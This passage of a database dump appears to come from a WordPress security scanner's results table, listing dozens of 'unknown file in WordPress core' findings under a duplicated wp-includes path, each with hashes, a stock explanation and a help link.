More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/blocks/index.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26660,1631424860,1631424860,'new','knownfile',75,'234bfd1d046018e80f3e22c4408e54cc','8ff9400625519cacd0bb673272f8c00d','Unknown file in WordPress core: wp-includes/wp-includes/blocks/latest-comments/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/blocks/latest-comments/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26661,1631424860,1631424860,'new','knownfile',75,'ca16b53e4de3146febe8e80a2624ecf2','fedb4a3fa01fd6350e478bfc0fe55e6e','Unknown file in WordPress core: wp-includes/wp-includes/blocks/latest-comments.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/blocks/latest-comments.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26662,1631424861,1631424861,'new','knownfile',75,'3b949dc86a3e0dbed5f991b0e3a1072b','ce21128b662589953c4ce1573aba722e','Unknown file in WordPress core: wp-includes/wp-includes/blocks/latest-posts/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/blocks/latest-posts/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26663,1631424861,1631424861,'new','knownfile',75,'d758f2aa833b8d9f1d8a643d297c3efa','448e0770bd7fe98bfd31f5e9dac9bc00','Unknown file in WordPress core: wp-includes/wp-includes/blocks/latest-posts.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/blocks/latest-posts.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26664,1631424861,1631424861,'new','knownfile',75,'fbfa76a3ea189cec8bb2c1fa39c86ff9','40bfc728f9ac95b8ebc63a3086ea13c8','Unknown file in WordPress core: wp-includes/wp-includes/blocks/list/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/blocks/list/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26665,1631424861,1631424861,'new','knownfile',75,'5723eb3ea1ae4d0810fa858858f394b7','4e5b7f807c1472f75fece1de552af9c7','Unknown file in WordPress core: wp-includes/wp-includes/blocks/media-text/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/blocks/media-text/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26666,1631424861,1631424861,'new','knownfile',75,'60396bdd5af83141ad20fb3925bb254a','dff98142d2a72ec1686e7d923db31598','Unknown file in WordPress core: wp-includes/wp-includes/blocks/missing/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/blocks/missing/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26667,1631424861,1631424861,'new','knownfile',75,'e2c3b73bbc00182a39b015067b24036e','7e1f56dc60adf57d53857bedfb78d0df','Unknown file in WordPress core: wp-includes/wp-includes/blocks/more/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/blocks/more/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26668,1631424861,1631424861,'new','knownfile',75,'d3c5e7c21a8310047537794cc0179440','38c35a908c117ad181416f39a0ac399c','Unknown file in WordPress core: wp-includes/wp-includes/blocks/nextpage/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/blocks/nextpage/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26669,1631424861,1631424861,'new','knownfile',75,'dd07d5514565342a95d0140c7e3338d3','440328570b3b9021bf59c1e34e573e8e','Unknown file in WordPress core: wp-includes/wp-includes/blocks/paragraph/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/blocks/paragraph/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26670,1631424861,1631424861,'new','knownfile',75,'6e1bc06b988a6682c7908f30ab51024a','a193d581f84ad7d16172ebfc6cd2d679','Unknown file in WordPress core: wp-includes/wp-includes/blocks/preformatted/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/blocks/preformatted/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26671,1631424861,1631424861,'new','knownfile',75,'ebd0b499dd8749ffad4fef6101a9512c','551620a63fc8703dbe7f8245b7564f26','Unknown file in WordPress core: wp-includes/wp-includes/blocks/pullquote/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/blocks/pullquote/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26672,1631424861,1631424861,'new','knownfile',75,'603c8ad376ced1d86945959ae4bf5cb0','13ac10fd9dfa6599c357b8a12a52dbeb','Unknown file in WordPress core: wp-includes/wp-includes/blocks/quote/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/blocks/quote/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26673,1631424861,1631424861,'new','knownfile',75,'276d9015d82a1b5750627a935978e534','456846a4a4022c91963b85da6aeedeb7','Unknown file in WordPress core: wp-includes/wp-includes/blocks/rss/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/blocks/rss/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26674,1631424861,1631424861,'new','knownfile',75,'66616582ff57ec00ee8dad683b1761e6','8bfb68c18eeab51dedb3bb8fb1c1df7c','Unknown file in WordPress core: wp-includes/wp-includes/blocks/rss.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/blocks/rss.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26675,1631424861,1631424861,'new','knownfile',75,'ec284de3d4b998506fe7d55bdec12281','2fca7660e2ff52003ae555ec40367983','Unknown file in WordPress core: wp-includes/wp-includes/blocks/search/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/blocks/search/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26676,1631424861,1631424861,'new','knownfile',75,'dcb669b892a6954a386bf450b091397e','f777e55a60491e06813416787aff1d61','Unknown file in WordPress core: wp-includes/wp-includes/blocks/search.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/blocks/search.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26677,1631424861,1631424861,'new','knownfile',75,'a33594215bc08c6f5b4668babb0acb0c','4b3cb7fe95d0c6e7bc8e26e709523346','Unknown file in WordPress core: wp-includes/wp-includes/blocks/separator/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/blocks/separator/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26678,1631424862,1631424862,'new','knownfile',75,'50a4446d741c8efca0fb8e8444e007df','772a6070b9b829b375f527e29bbc867a','Unknown file in WordPress core: wp-includes/wp-includes/blocks/shortcode/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/blocks/shortcode/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26679,1631424862,1631424862,'new','knownfile',75,'795b4acd27834f3b5773803aa72bb167','86260232f836f00ac5b16e21b4fcc25b','Unknown file in WordPress core: wp-includes/wp-includes/blocks/shortcode.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/blocks/shortcode.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26680,1631424862,1631424862,'new','knownfile',75,'0396e52b609e28ddb100eb2ac8c93f42','225a5642ec30875a6fadf95718397796','Unknown file in WordPress core: wp-includes/wp-includes/blocks/social-link/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/blocks/social-link/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26681,1631424862,1631424862,'new','knownfile',75,'8b95e4742c60da50cf7c79e0adff49c2','abbdd99c7a54ad8c618b464127bb6f06','Unknown file in WordPress core: wp-includes/wp-includes/blocks/social-link.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/blocks/social-link.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26682,1631424862,1631424862,'new','knownfile',75,'e240da9ff283bcc5a7404926b0001a7c','2fd416e1ab90d45093a9776039858452','Unknown file in WordPress core: wp-includes/wp-includes/blocks/social-links/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/blocks/social-links/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26683,1631424862,1631424862,'new','knownfile',75,'16b956dde3524d622d562b10f9501cf6','9e51777151a277bb1e0baed4f150ca85','Unknown file in WordPress core: wp-includes/wp-includes/blocks/spacer/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/blocks/spacer/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26684,1631424862,1631424862,'new','knownfile',25,'ede8b5ef4e81224688b953b97832affc','3c5efb684c8f903c8a9a03d2c6777b45','Old WordPress core file not removed during update: wp-includes/wp-includes/blocks/subhead/block.json','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/blocks/subhead/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26685,1631424862,1631424862,'new','knownfile',75,'ee5c9c5b17c792a861825a25901d2426','6ff8339b3a15a17dfb499901a002ecd3','Unknown file in WordPress core: wp-includes/wp-includes/blocks/table/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/blocks/table/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26686,1631424862,1631424862,'new','knownfile',75,'15b23248bade415285de9e2b6a26b229','9c1be3621a4799f08b49072197f4ebc2','Unknown file in WordPress core: wp-includes/wp-includes/blocks/tag-cloud/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/blocks/tag-cloud/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26687,1631424862,1631424862,'new','knownfile',75,'50a80a202d8bc8ff5734961f84eae607','77ff8a7c9dd0dbafecb99c7e9c85cc56','Unknown file in WordPress core: wp-includes/wp-includes/blocks/tag-cloud.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/blocks/tag-cloud.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26688,1631424862,1631424862,'new','knownfile',75,'5481fe1778db2259b32cb3a64bbd680a','e78543f8b44acbc044b7dc671d47b2b5','Unknown file in WordPress core: wp-includes/wp-includes/blocks/text-columns/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/blocks/text-columns/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26689,1631424862,1631424862,'new','knownfile',75,'68f2710f779f4357c415ac9669b4ecfe','f6069aa5aa186a02c2342612357b2d0a','Unknown file in WordPress core: wp-includes/wp-includes/blocks/verse/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/blocks/verse/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26690,1631424862,1631424862,'new','knownfile',75,'8a094885b3ad7fce6128cf64bfdcd2bc','129fd6d50b6d1010e847eaf4861a8cf0','Unknown file in WordPress core: wp-includes/wp-includes/blocks/video/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/blocks/video/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26691,1631424862,1631424862,'new','knownfile',75,'7a3071c31772f7b676faf2bbc62c580c','6dd0757edf75a166e4f04a1943b02ffd','Unknown file in WordPress core: wp-includes/wp-includes/blocks.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:34:\"wp-includes/wp-includes/blocks.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26692,1631424862,1631424862,'new','knownfile',75,'de4ee4a6b6267d2a62aa0f2b82d91705','6aba328a7442bce3ea5395a93c358d1f','Unknown file in WordPress core: wp-includes/wp-includes/bookmark-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/bookmark-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26693,1631424862,1631424862,'new','knownfile',75,'82cd49f7cc62f2f3e2d03f69f7b82924','7f8327094385e6cfb07c592deb2d718b','Unknown file in WordPress core: wp-includes/wp-includes/bookmark.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/bookmark.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26694,1631424862,1631424862,'new','knownfile',75,'ed0fc25eea917a84c7665b9cf36dde1c','9f7571c9c889492169da35c48e0fd46b','Unknown file in WordPress core: wp-includes/wp-includes/cache-compat.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/cache-compat.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26695,1631424862,1631424862,'new','knownfile',75,'5d0a6b6f368473da7d6e921c24cd9a80','882af391390b1a33a2a888a6c5653b1a','Unknown file in WordPress core: wp-includes/wp-includes/cache.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:33:\"wp-includes/wp-includes/cache.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26696,1631424863,1631424863,'new','knownfile',75,'3540dc3f116333dfaf8ab796df2d3a60','aa02c61a6e7049d0cfc0e4f74d0f1322','Unknown file in WordPress core: wp-includes/wp-includes/canonical.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/canonical.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26697,1631424863,1631424863,'new','knownfile',75,'550ca3f0926edd386572a12b1f9df51c','72b0a43410c8faaf4aecf003515279d4','Unknown file in WordPress core: wp-includes/wp-includes/capabilities.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/capabilities.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26698,1631424863,1631424863,'new','knownfile',75,'2d132f74d696a581ee7c8099d962dad6','5d2d1c2e2457356063805bd2ebad7244','Unknown file in WordPress core: wp-includes/wp-includes/category-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/category-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26699,1631424863,1631424863,'new','knownfile',75,'8680c2b3932d489c45c20be8501bb41b','ba73335a6d3f302fbbb112181fc481b0','Unknown file in WordPress core: wp-includes/wp-includes/category.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/category.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26700,1631424863,1631424863,'new','knownfile',75,'3254d66277eb8e5ddd926936075899f7','b75ba01554fb38e70af22a053c1471d9','Unknown file in WordPress core: wp-includes/wp-includes/certificates/ca-bundle.crt','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 